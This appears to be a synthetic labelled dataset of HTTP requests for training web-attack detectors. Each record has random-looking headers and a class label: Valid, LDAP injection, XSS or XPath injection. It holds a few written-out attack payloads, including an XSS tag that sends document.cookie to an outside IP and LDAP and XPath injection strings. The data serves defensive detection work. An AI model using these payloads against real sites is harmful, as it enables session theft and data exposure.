User-Agent: nad5 (i1KV68c; uQMK79xQu; xWX@XGvw)
UA-CPU: 68000
UA-Disp: 5129,6449,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8738x825
Via: 8.4 www.Ue9eah.gif, 5.1 www.ie2s.tiff
Transfer-Encoding: identity
Upgrade: een/2.2
Warning: 708 132.88.214.56:00119 "eafagnwnp6tlo" 
X-Forwarded-For: 129.8.72.4
X-Serial-Number: 71873
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 2018
Start - Id: 8389
class: Valid
GET /tgerxh8ohabySc/S0dcRcetc@SbpBtx/esehe4t/qSty/77tMRN-owQEgT6jW.cfm?_rNrcpohtpass=eeir&sre4awlio=diuhpasswdh&Lljh=34&m41gKSYlibkUeD=n%28sam&sqyTcoaiTw=hSt4L4UGmrn&e3teeCat=e+na+ml&smhqdoweriae=s2ecJes1bq&athion=28204&6PAexec=jsobjectra%3A3ee%28z+&SLXselectp=u7l%26mlbt%5Bn&mOeshutdownwp-=oaodey%25uErPgi HTTP/1.1
Host: 61.124.47.233
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-chinesesimp;q=0.7, cp-950
Accept-Encoding: 
Accept-Language: zgg77-soaci;q=0.6
Cache-Control: no-store
Client-ip: 55.14.13.126
Cookie: 2ed9inerriT=olocationsig$https
Cookie2: $Version="05"
Date: Mon, 21 Dec 09 04:46:46 CET
ETag: "3jaqTACFujJ6duM"
Expect: untOhhii=htmg
From: eeqsa@nsrtpHttai.com
If-Modified-Since: Tue, 27 Nov 07 23:50:47 CET
If-Unmodified-Since: Tue, 27 Nov 07 17:14:14 CET
If-Match: "FjQ246waaloqP.heIAs"
If-None-Match: "CYMVf405fU3PDIfl"
If-Range: *
Max-Forwards: 7
MIME-Version: 9.5
Pragma: LvoYhn=R
Proxy-Authorization: Basic ZGtjczplWWNuZHRmRA==
Authorization: a1tff cno1lhs=lieHhEc
Range: 994131-66069
Referer: http://iseH.it/mUyta/Yocls/oyby0kfm.pl
TE: deflate,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/2.6 (compatible; MSIE 5.8; Win98; eRedp5z7pn; z2eaeeih; nn4etotdtl)
UA-CPU: MIPS
UA-Disp: 283,560,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4723x390
Via: HTTP/4.7 www.tceiidO.tiff, 6.8 www.rsinr8.jpeg:42480
Transfer-Encoding: gzip
Upgrade: o1iL/4.6
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 240.233.176.16
X-Serial-Number: 5442367838332838
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 8389
Start - Id: 38256
class: LdapInjection
GET /gnqp18.exe?e1ueaey=%3Btpbbtueo&3478ios55t=kxhfeaow7e5fi&ew=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&scidif8=aaq7perlj&vcryq3ZXTD=nl&resemIc=3222&Wndclyy7qnsl=csin&fddilstsIdec=04860&taesdFctEr=i+connectlLodbu%27lap3rgroup+bymt&XRRSors=rmh2mn%5Dnn HTTP/1.1
Host: 173.103.60.56
Connection: nte8wt
Accept: */*;q=0.4
Accept-Charset: iso-8859-3;q=0.9, x-mac-arabic;q=0.7, x-mac-japanese, cp-950
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.1
Cache-Control: tqenr='lre'
Client-ip: 113.81.106.78
Cookie: Vg-mEnS.Rftp=eyo$itacQftpug;eSllHtibAmea=lAMm3Iv3fgC;bmoenes6Ayst2=|6s~/
Cookie2: $Version="7"
Date: Sun, 25 Jan 04 24:40:39 GMT
ETag: W/"DNHJE2Dphp9snBkz4oAm"
Expect: seeqhc=sss6
From: Eorust@uthn0.it
If-Modified-Since: Sat, 11 Apr 09 19:41:02 GMT
If-Unmodified-Since: Thu, 11 Nov 04 11:58:07 GMT
If-Match: "o8xU69oDhENqsmWJ.QN-"
If-None-Match: "coOejr864b_ZOWknmw"
If-Range: *
Max-Forwards: 7904
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: Digest nc=ae7cBFCB
Range: -23
Referer: http://www.rldciu.uk/uobO.cfm
TE: chunked,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.3 (compatible; MSIE 4.5; WinNT; Pvztznr)
UA-CPU: PowerPC
UA-Disp: 087,798,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8163x303
Via: 5.6 www.hety.css, 0.4 97.201.217.41:83070, aad/6.8 www.vmaei.gif
Transfer-Encoding: compress
Upgrade: eddcT/3.3, roas/0.6
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38256
Start - Id: 3833
class: Valid
GET /u0s4MQqcdQCRUC2S/reds2tcsprilatiroeee/cu2L-LFm4/mnpghiHpyz_qIb4v.2t/tva4eis86hhgN3f7.pl?heso=1wr6iodbb&Slewaoneg=nZ9JavBV&qRdiap7ahaagi=e.J&MYfxZ9=npF7.-0fx2RT HTTP/1.1
Host: 116.173.147.239:669
Connection: ondew
Accept: */*
Accept-Charset: x-mac-chinesetrad, iso-10646-ucs-2
Accept-Encoding: *
Cache-Control: no-store
Date: Wed, 27 Jun 07 03:55:12 CET
If-Modified-Since: Wed, 04 Aug 04 13:00:44 GMT
If-Unmodified-Since: Sun, 06 May 07 03:48:55 CET
If-None-Match: "1.xyrWqzoJrzKpWFz"
Proxy-Authorization: Basic aG93ZW5zdDpJaWFnbw==
Authorization: Digest username="wuh4tfgd"
Referer: /llrbar1/AShhc/satiltw2/hiurtea.png
TE: chunked;q=0.6,gzip;q=0.4
User-Agent: Mozilla/9.8 (Windows; U; WinNT 3.4; ru-W3; rv:3.3.1) Gecko/91749903
Upgrade: eeyd/1.5, nTs9te/2.1, tdqnc/6.5

null

End - Id: 3833
Start - Id: 46999
class: XSS
GET /iMuRM38/hidiagvmoIkrahiiopw0/nzkHBIBhvTaixvGcY/xeseooAr4matiohieer/uanEstte3tauorryeim/inYbog1sz0I.js?ecAeet=772701&a8i=hacdt&jDuqnslii=ei+or&3ozbfumuh=se1qh&rh2ifr=8menb2&n9=%3Cimg+++src%3D%26%7B%5Bwindow.open%28%27http%3A%2F%2F93.227.111.152%2Filnt.asmx%27%2Bdocument.cookie%29%3B%5D%7D%3B++++%3E&g5=l4%2FT HTTP/1.0
Host: 183.206.17.229:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-5, iso-2022-kr;q=0.0, iso-2022-jp;q=0.1
Accept-Encoding: 
Accept-Language: uh-elr, eel-rovvs;q=0.1, em1to7-t;q=0.2
Cache-Control: only-if-cached
Client-ip: 0.51.121.220
Cookie: ugnpd=21;0log..k2=oeaua;smdaI=o<aiille%insert
Cookie2: $Version="5"
Date: Sun, 20 Dec 09 17:09:50 GMT
ETag: "o8HdQMwRnEl_XlX"
Expect: 100-continue
From: vsl8rn@orhoE.de
If-Modified-Since: Sat, 28 Feb 04 09:10:24 CET
If-Unmodified-Since: Sun, 16 Jan 05 10:22:09 GMT
If-Match: "31y3tbGm0ffYRfQrxv"
If-None-Match: *
If-Range: Sun, 28 Feb 10 21:20:44 UTC
Max-Forwards: 5318
MIME-Version: 0.5
Pragma: kmrrAwtf='etoO6bo0'
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Basic ZUVtVDp1dE50dw==
Range: 5-22964
Referer: /jfmn/halp/ngotadsi/oxi2tt/aetsdut.htm
TE: trailers
Trailer: Upgrade
User-Agent: 7qnlwre5 (zk-9Bs; sR-J_v@)
UA-Disp: 0784,5825,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 238x292
Via: 4.5 www.idqx3.shtml, 5.0 103.195.142.198, 1.1 www.atzoecF.gif
Transfer-Encoding: identity
Upgrade: 5ve/2.6, a1rbm/0.6
Warning: 544 www.ccrt.gif "oteAehiueo" "Fri, 15 Apr 05 23:43:34 GMT"
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46999
Start - Id: 4460
class: Valid
POST /Sla6r1heenneq/Zin@LzLjFcjtI0/nZMliH5G/r3_mgLAhome/eVEO2HOBV/oJIT9llulTuQbMgtI9iV.jpg? HTTP/1.1
Content-Length: 134
Content-Language: 3
Content-Encoding: identity
Content-Location: /ooupuisO/Vsl5yaol/nburasJe/echokE/glmkas.js
Content-MD5: ZG91aWVyaWhlbWx0QXZldA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Oct 05 11:40:42 GMT
Last-Modified: Wed, 01 Dec 04 18:24:32 CET
Host: 142.143.65.253:80
Connection: keep-alive
Accept: application/rtf;q=0.3, audio/*;q=0.2, video/*
Accept-Charset: *;q=0.9
Accept-Encoding: identity, deflate;q=0.2, gzip, identity, gzip;q=0.0
Accept-Language: layhotWi-cmuoda;q=0.8, 6e3tance-lsgodn
Cache-Control: no-transform
Client-ip: 213.79.144.81
Cookie: pasnh0o6nal=a7.9L;cydlw=99698424;tiasnnnemmOawm1=w;toe=e;natsert8isti=03
Cookie2: $Version="40"
Date: Fri, 26 Dec 08 02:52:20 GMT
ETag: W/"OUpMm4jTv5YUK54@DWM"
Expect: t7tdehi=moea;Lo5eT7=i2dirZa
From: iuNm6e@ihsbaaneEr.be
If-Modified-Since: Sat, 05 Apr 08 11:17:45 CET
If-Unmodified-Since: Sat, 18 Aug 07 14:34:01 UTC
If-Match: "colPxnTIBPHB84P"
If-None-Match: *
If-Range: Sun, 18 Jun 06 04:08:17 UTC
Max-Forwards: 2
MIME-Version: 8.6
Pragma: oyykhR='xhrbgCyo'
Proxy-Authorization: tteD1b cIt9h=clhirtkx
Authorization: Digest nonce
Range: 6054-,403221-,3-
Referer: /edtasCr/rws9N5rr/unbfb/gdoq.jsp
TE: gzip
Trailer: Expect
User-Agent: t5G0.vnW4 http://www.0et9.ch
UA-CPU: StrongARM
UA-Disp: 9080,142,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 421x3151
Via: sL5ol/7.5 43.176.32.191:211, HTTP/2.7 www.alltn.htm
Transfer-Encoding: gzip
Upgrade: iedsre/8.3, Tgua4/8.3
Warning: 835 133.223.176.11 "9IkBlRdeatilrei" "Sat, 18 Aug 07 07:10:31 UTC"
X-Forwarded-For: 52.226.162.103
X-Serial-Number: 053208446
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nOnaciefaOm=r-VFaKLY&eciHb9ol=)perlaa6n&dete=dnip82azyeos&mt4he8ta7buvu=62984&Y7ik=43946&sfng=>&cobC=kjM7&nnpiahpm=gscriptnhixcRrL

End - Id: 4460
Start - Id: 34635
class: Valid
PUT /ftpWcmdM17/h3SxI/aiaiOTle3o/a1z3rkirc/rcvp2sj9cdAunblrow/uL1jwkhJU.png? HTTP/1.1
Content-Length: 33
Content-Language: hycan6o
Content-Encoding: identity
Content-Location: http://9Oxnt.be/nkurztW/ir9rOdei.swf
Content-MD5: OGhoaWFiRkVvM3lhZWNzZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Dec 07 17:43:56 CET
Last-Modified: Fri, 01 Jan 10 11:58:15 CET
Host: www.hsz3tdmg.ch:6
Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-1254;q=0.7, iso-8859-4, isiri-3342
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 15.193.160.4
Cookie: c2t9c=0896291995;0enodegPfrcpRqrCt=tma;cX4cnTmD6G=sgz
Cookie2: $Version="82"
Date: Sat, 30 Apr 05 21:27:16 CET
ETag: W/"sXjXuprBJw.IWUcvzYx"
Expect: cTThrr
From: ebe2@s8zmeu.com
If-Modified-Since: Sun, 20 Mar 05 18:21:59 CET
If-Unmodified-Since: Sat, 26 Apr 08 06:33:28 CET
If-Match: "WhK731wnEgrb0t5NDdx6"
If-None-Match: "HC.R@jQMU6Cw3BQD"
If-Range: "1NNvjpxSHlqz6V0gVE@P"
Max-Forwards: 11
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.x4ihPxh.ch/M14aso.sh
Authorization: ebotx beol=hwruee
Range: 55937-
Referer: http://OavwrA.net/tnAi/ea7o/euKLls/yu3x/osqrdorm.bin
TE: gzip
Trailer: Connection
User-Agent: Mozilla/0.5 (X11; U; Linux i386 4.0; ld-pr; rv:9.9.5) Gecko/52282374
UA-CPU: PowerPC
UA-Disp: 379,2037,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3397x406
Via: FTP/6.9 www.c4mokT.jpeg, 2.0 66.17.236.165
Transfer-Encoding: rapt
Upgrade: ths/3.0, dsi/9.6
Warning: 527 76.238.80.61 "hris94" 
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 09613
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

D.8W=rp3T_TXG74w&7gnsv=1JuUcss=

End - Id: 34635
Start - Id: 34775
class: Valid
PUT /eYhS-dXAb/rpshtiihiid9iwd/s71kU/OSleheb/mqB0iU5nD.js? HTTP/1.0
Content-Length: 62
Content-Language: tobkaete,r
Content-Encoding: gzip
Content-Location: /eroi/bnubr/h2am/tscIt.php3
Content-MD5: d3NraGVzMGV1czZDZXJhaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Oct 09 09:08:02 GMT
Last-Modified: Fri, 03 Dec 04 09:51:35 GMT
Host: www.tohar.be
Connection: shpsife
Accept: video/quicktime;q=0.1, video/*;q=0.1
Accept-Charset: x-mac-korean, x-mac-chinesetrad, us-ascii;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 100.1.231.182
Cookie: b5N9mge=oHxtee9s3;g9Hfzs=nAP@s_;0jtpto7i=is34Us;pnLtpeqaBgweji=tolEtrsemdn1bels
Cookie2: $Version="84"
Date: Sun, 01 Jul 07 18:26:05 CET
ETag: W/"qy9RGYQYU@vXKZIJ2hvz"
Expect: rnuaet
From: 4nxqdb@y0cwsr.uk
If-Modified-Since: Sat, 27 Mar 10 13:31:49 GMT
If-Unmodified-Since: Mon, 19 Oct 09 10:32:01 UTC
If-Match: "rMId5qs-VlIVVytX"
If-None-Match: "J8RPge7vsKnwIZ2G3U1S"
If-Range: *
Max-Forwards: 413
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: sssem eiteh9=s7a8xhej
Authorization: NTLM SXVsdHRSbXBydFQ2dGxmYTFuZmhzaWtlYmV0a2FvZWxnNjZsZ3VobmRTczI=
Range: -904
Referer: http://enan8.cz/omiee0/rNp4tppP/bxhoa/c8m9nd.swf
TE: trailers
Trailer: Range
User-Agent: Mozilla/5.0 (Machintosh; U; PPC Mac OS X 8.0; de-ks; rv:7.6.1) Gecko/58220709
UA-CPU: MIPS
UA-Disp: 456,5311,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 262x4505
Via: 8.1 105.122.182.46:6, 2.6 www.anvohqtr.png
Transfer-Encoding: identity
Upgrade: Zem/1.3, pcRSe/9.2
Warning: 563 www.oSibytw.htm "7HeelDne" 
X-Forwarded-For: 59.6.197.154
X-Serial-Number: 438515700357527
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

odkunhon=athlvJj&aiife8=tNUFTILDU_&iy88tesn=VyobhnakEuooEemili

End - Id: 34775
Start - Id: 34705
class: Valid
PUT /oAiilsotiAa5pifer/ntOa/AinputUqusrAK5CKB0Fy.php4? HTTP/1.0
Content-Length: 89
Content-Language: O,aI,brh
Content-Encoding: compress
Content-Location: http://www.eei5m.st/ag6p2e/nftsopee/ditah7.zip
Content-MD5: Y2F0bHR0YXRsRG91ZUNheQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Nov 07 24:40:17 CET
Last-Modified: Wed, 12 May 04 03:18:28 UTC
Host: 246.134.80.122:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-8, x-mac-greek;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 73.227.22.34
Cookie: rpmymdcsrr=r@wnJEE;@gRoA=tp@bgwblePZ;tslie7ueen=u3nbdtro;ltPrprck=sDYhMPDZt
Cookie2: $Version="0"
Date: Wed, 13 Jun 07 18:28:40 UTC
ETag: W/"FiuRvdyZslFb3tqOsaF"
Expect: t40ltsba
From: AldbOe@adtq8r.uk
If-Modified-Since: Wed, 22 Jun 05 16:31:46 GMT
If-Unmodified-Since: Tue, 28 Sep 04 15:45:21 GMT
If-Match: *
If-None-Match: *
If-Range: "p6AWRRetEsxmT9KNLwI"
Max-Forwards: 99
MIME-Version: 5.1
Pragma: ret9asp='gchnwame'
Proxy-Authorization: Digest realm
Authorization: NTLM OTZuUDdvdGt0RnR2YWZPaGVPaGlib285YXRyNGQyaWw=
Range: 27601-82680,576792-311040,-975285
Referer: /OTe0fa5/jrre/tfrzis.jsp
TE: gzip;q=0.6
Trailer: Range
User-Agent: vuD-6CKN http://www.Etrrthd.com
UA-CPU: Sparc
UA-Disp: 659,9099,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 163x0175
Via: 9.8 197.201.91.91:79641, 9.3 245.164.0.100
Transfer-Encoding: a1xecl
Upgrade: nq8o/9.4, hsea/1.7
Warning: 385 10.222.142.109:943 "a8tswatndeopoi" "Sat, 28 Jun 08 07:56:55 CET"
X-Forwarded-For: 202.121.49.166
X-Serial-Number: 4224669367104
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~

Eeo=471301&ik=%nT&fjsyueoaiaUfWo=53178&onti=Ftveare&2n4fjxgaaehi=37&tNgTrscWuttl=197165

End - Id: 34705
Start - Id: 29437
class: Valid
GET /n-iCaZsLJz3Cj-vVBZ/ne/ioanncsts.bin?wrfjahs=a&updateTThjT3wp-kO=a.4xPd_5x&frahajrs=891103&tqshtE1ketiirar=ryp14elinks4o%3F%3Etldiv&li3h8nA1r7l5st=acieeonmld8FAeeieu&ium8atldi=00251673&anHuralui=Indsahtc&bfNVsuIp5=Enfwvbscript&sons4e=dks&e03=dsjtazjnkeuinT8d HTTP/1.0
Host: www.js9n.ch
Connection: keep-alive
Accept: image/jpeg, image/*
Accept-Charset: windows-1257;q=0.1, cp-950;q=0.8
Accept-Encoding: *
Accept-Language: thnesxiu-tncoeeoq, gvi-foeAsn;q=0.8, hieiay7s-rcy, yafecew-orrai2s6
Cache-Control: no-cache
Client-ip: 28.137.249.243
Cookie: rSc1tltH1mrdt=eOio;toDwhnat4t=Ogsoas9;ae=xt9DettdenyjHou;terd4tdea8=omuos
Cookie2: $Version="346"
Date: Mon, 10 Dec 07 02:39:33 UTC
ETag: W/"8qflqO6uDAIjbMu19u4j"
Expect: e4skeya=nemhrRk;zegybsow
From: neroa@r4ln7hredo.cz
If-Modified-Since: Tue, 27 Jun 06 14:08:26 CET
If-Unmodified-Since: Fri, 09 Apr 10 23:57:47 UTC
If-Match: "UEpnljU..Bx5rp6X"
If-None-Match: "w63gSj1qG-hDV5-lsR"
If-Range: *
Max-Forwards: 7745
MIME-Version: 6.5
Pragma: hyp='ape0sao'
Proxy-Authorization: Basic cm9zbjRkcDpyczM3c2FoZQ==
Authorization: Digest response="fFB9D3bde0Db6f4D2A3D76bA55B0bB2E"
Range: 6527-0267
Referer: /oslea.php4
TE: trailers
Trailer: Upgrade
User-Agent: rwqYqO http://www.uiu0Aea.gov
UA-CPU: PowerPC
UA-Disp: 206,807,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7858x401
Via: 3.6 www.nm5aDn.png:258, HTTP/5.6 www.aItonch.tiff:38349, 4.3 www.nZidEshk.shtml
Transfer-Encoding: deflate
Upgrade: motr/5.8, tavtH/0.5, 3eeyua/8.2, dC8c/3.4
Warning: 881 224.80.69.65:4958 "uy4Z" 
X-Forwarded-For: 25.153.217.247
X-Serial-Number: 58149982680472184
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29437
Start - Id: 18301
class: Valid
GET /l0iA9Mphp7nXI-/reeasIeshechtrb/h1Gy7EFROd1VTlkPrSt7/5EnKWNenlj/oJu6zbCNjy5/toPIjjd1F5QWoxDF0h/rZF.yg0whyzx8c/ascriptr.css?k7nees6ycSl=utSlgemd7eaieexaa&eju5nda=aIipasswdy&netni=0084&cIoa=7&sil=W%3Du&o6rnlmsa5oOob=828&bent=%40Y&nacyuNzsno=03feaZFQKPf2&hmofOh=51&saulieeeLtodc8a=17032364&sdcnlqgie0=ipht5eslibh+awa&_body8KXTrmGi0=eHJDIMf&rgeAsn=2618810496&bRoeeh=79&mgo=n%7Cc+ey-iareplaceselectigr%24o%5Dj HTTP/1.1
Host: www.6ue2yruha.biz
Connection: keep-alive
Accept: text/*;q=0.3, audio/basic;q=0.8, video/*;q=0.9
Accept-Charset: windows-874;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: ny=mad
Client-ip: 34.186.224.238
Cookie: pthi=48134750;diroshfi4=gokK5GQyvPT
Cookie2: $Version="99"
Date: Tue, 05 Jul 05 19:11:00 UTC
ETag: "@u3l8ojv12CM3I0QQw2"
Expect: 100-continue
From: drsH1i@mudidGibzl.gov
If-Modified-Since: Thu, 09 Apr 09 10:32:12 CET
If-Unmodified-Since: Wed, 17 Sep 08 10:29:48 UTC
If-Match: "QVCbjNjMqKOz_l7qZf"
If-None-Match: *
If-Range: Fri, 11 Apr 08 12:57:45 UTC
Max-Forwards: 77
MIME-Version: 6.5
Pragma: ISx='a77'
Proxy-Authorization: NTLM dWVhM3Joc3d4YXJ0YW9udVNhdEx4aWVtZWhkYWFoYXRhYmFpTA==
Authorization: Digest username="e8tAsug"
Range: 6061-289668,471-,-1956
Referer: /Neal/Poec/iteinel/t8mothh/Yhfsswap.swf
TE: trailers,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: 3nmtn5huit (eP0GPtQO; 0B1eo4_vY; pgwA_@we7t; notHPB0I)
UA-CPU: PowerPC
UA-Disp: 644,336,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0744x394
Via: Nwrmy/8.7 www.vennx.jpg, 5.0 www.aAsaewu.js
Transfer-Encoding: gzip
Upgrade: aeft/2.6, oxx/2.6
Warning: 691 159.83.199.10 "ssthn1eteotanoanyAdf" "Fri, 25 Feb 05 15:18:51 CET"
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 9583617026420490127
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18301
Start - Id: 3237
class: Valid
GET /q4Ry1RntR9TPr/62Dzfeq2dk-3D-EFXH3/t_PE1pnageM9GI/dsfoil/fegerdHdlhiFouoss/aDnX.jpeg?mshF=uicoboanm8cmm2qts&d7reritniTeh=42&1sm0lfu=tpl0es%3CDpasswd%5Bf&ahr=ensm%25u%5CaASAT4evalaTht%27%26&3zt=HodJdfpnAr+&usw5=63&knpn=hmni%3B HTTP/1.0
Host: 51.71.82.118
Connection: inp2jj
Accept: */*
Accept-Charset: cp-936;q=0.7, iso-8859-7;q=0.7, big5
Accept-Encoding: *;q=0.5
Accept-Language: oi7El-nqn, ulaw-u;q=0.1, i2clh-al6l;q=0.5, arqd-Pwen, si-y4geem;q=0.7
Cache-Control: max-stale=979
Client-ip: 203.41.133.121
Cookie: 2ihAtnebepf=hc7vqsK0GudE;c5maolone=raqh3;hne=tP6bRu2pjo
Cookie2: $Version="940"
Date: Thu, 09 Aug 07 03:38:52 GMT
ETag: "ApY8eeuPU@ZPUbkv"
Expect: desjR
From: enn6@rliEa.it
If-Modified-Since: Fri, 17 Mar 06 10:06:52 GMT
If-Unmodified-Since: Fri, 12 Jan 07 24:50:57 GMT
If-Match: "cT_oNXsQwct-FsgK"
If-None-Match: *
If-Range: Mon, 01 Oct 07 22:21:59 UTC
Max-Forwards: 07
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic dGVpaHM6b2lsYWRkYWk=
Authorization: Basic aW93cm0ycTpsc3dv
Range: -9119
Referer: /oetptw/27i3st.swf
TE: trailers
Trailer: Host
User-Agent: ohoaug/2.4.2.1
UA-CPU: x86
UA-Disp: 098,469,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 796x812
Via: FTP/7.0 138.253.131.197, 2.5 www.xabg.js:07, FTP/2.9 161.246.123.207:327
Transfer-Encoding: compress
Upgrade: Anim/9.2, 4ebtk/6.4
Warning: 925 www.t1tEewa.css "iYe7tpBtm7wyjraztas" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3237
Start - Id: 49953
class: XPathInjection
GET /sr93omeegn/rMV24rdf/iewen/tXbo_5bH6VHOuxCW8LM8/eOielotb2c1drRqscfTn.css?qas=xc&set=n%7EjH+Oobb%5DAh86%7E&7RoucOueloaeta=3+or+++1%3C++++od%2FsetWFy%2Fo5tbqT%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D8%5D++or+++++71%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&e7nten=3936&ngit7o8nrus3q=31351&zTCncdocumentC=l9jfa6 HTTP/1.0
Host: 147.234.10.131
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: ai-aeou6e;q=0.2, i-H;q=0.9, ufnsj-dntmto2u;q=0.2
Cache-Control: no-transform
Client-ip: 6.57.199.123
Cookie: PSkPrLdelete=Bs;efjhofxt= ;edmed4lihba=fsn;tElNe5eqrolE=eeetc;vhozltiob=49263591;4aalihadi=iJ7
Cookie2: $Version="9"
Date: Mon, 12 Jun 06 13:31:22 GMT
ETag: W/"Iy_DNmlUhoJDmsXeKRd"
Expect: 100-continue
From: thnep@gnfilnelrR.biz
If-Modified-Since: Wed, 16 Apr 08 08:27:21 GMT
If-Unmodified-Since: Mon, 07 Mar 05 10:51:09 CET
If-Match: "g2sH@cRsy4dKvnb_"
If-None-Match: "zNX.NeWuwJFY-Fw."
If-Range: Thu, 07 Jul 05 13:36:03 CET
Max-Forwards: 89
MIME-Version: 0.7
Pragma: nmd='3'
Proxy-Authorization: NTLM ZWNuN2NibnJlbjJqZ253bWVlcnRXZmRvc2xvdmxubGllY2FyZWl3ZXBOd2w=
Authorization: evwOlt lsy3mt=9sciu
Range: 33-0
Referer: http://udhu.org/uehom3/eohnxten/e2nst/P6ifYeh/emIerr.doc
TE: trailers,deflate;q=0.2,gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: Eaeym/1.5.3.0
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2041x3742
Via: FTP/9.3 www.9goxeoae.tiff
Transfer-Encoding: wtev
Upgrade: d4T/6.8, oecM/8.1, tgey/1.2, v4dyl/2.5
Warning: 631 www.reelek.js "sooCrilind" 
X-Forwarded-For: 43.162.129.161
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49953
Start - Id: 4911
class: Valid
PUT /RE.nt6CZQR/a4VD/a1GtKuuZa/injTl/eereeae1t0ab/nNetgC/48kwetcM0g/wfoUgR2s.WkAyU/cAhB.lsO0a.ndwhttp/tW_Lv_tUBHPsw5Kti/bdekwdpt23fTsioAggse.pl? HTTP/1.0
Content-Length: 75
Content-Language: itUnaTem,lzc
Content-Encoding: deflate
Content-Location: /scanko4/aitn1s/xigu/LlR0.dll
Content-MD5: aWhOcnBtbm1vaG9hY2xzdw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Mar 10 06:09:34 UTC
Last-Modified: Wed, 19 Aug 09 15:25:15 UTC
Host: 237.140.28.53
Connection: phoq
Accept: image/*
Accept-Charset: *
Accept-Encoding: identity;q=0.7, identity;q=0.7, identity;q=0.6, compress
Accept-Language: *;q=0.1
Cache-Control: nHe='txhhe28a'
Client-ip: 165.127.88.109
Cookie: qEgohee=ac;6b=qa1delete7;hqL42inpImkiq=Tu nt;Hsdc=41488;niaysoiidtoulwc=9802995984;qldT29tqmr=3tdlIRtIejsrh5rfet
Cookie2: $Version="150"
Date: Thu, 22 May 08 18:54:32 GMT
ETag: "gocflTTvp1OfV1Ur"
Expect: 100-continue
From: eban@aMheygk.fr
If-Modified-Since: Wed, 10 Oct 07 20:23:54 GMT
If-Unmodified-Since: Thu, 12 Feb 09 20:15:36 CET
If-Match: "SUp5jgnEt7jB9s3"
If-None-Match: *
If-Range: Mon, 12 Mar 07 08:05:02 GMT
Max-Forwards: 76
MIME-Version: 4.1
Pragma: oAenaUpy=star
Proxy-Authorization: NTLM b2JhYWVkb2VkekgweEU4eGRpbWxobnNtdHRmdWV0SG9lRGl0MWVRdA==
Authorization: Digest response="E0BeA0d67c03c8Ba26b21997CDa24fb9"
Range: 0401-,-401,485260-5
Referer: http://unemeo.biz/x1Een4a/ylCnh/znTvap/402fmvi.css
TE: trailers,trailers,chunked
Trailer: Date
User-Agent: ao520h4 http://www.w9nrengc.gov
UA-CPU: x86
UA-Disp: 085,1074,32
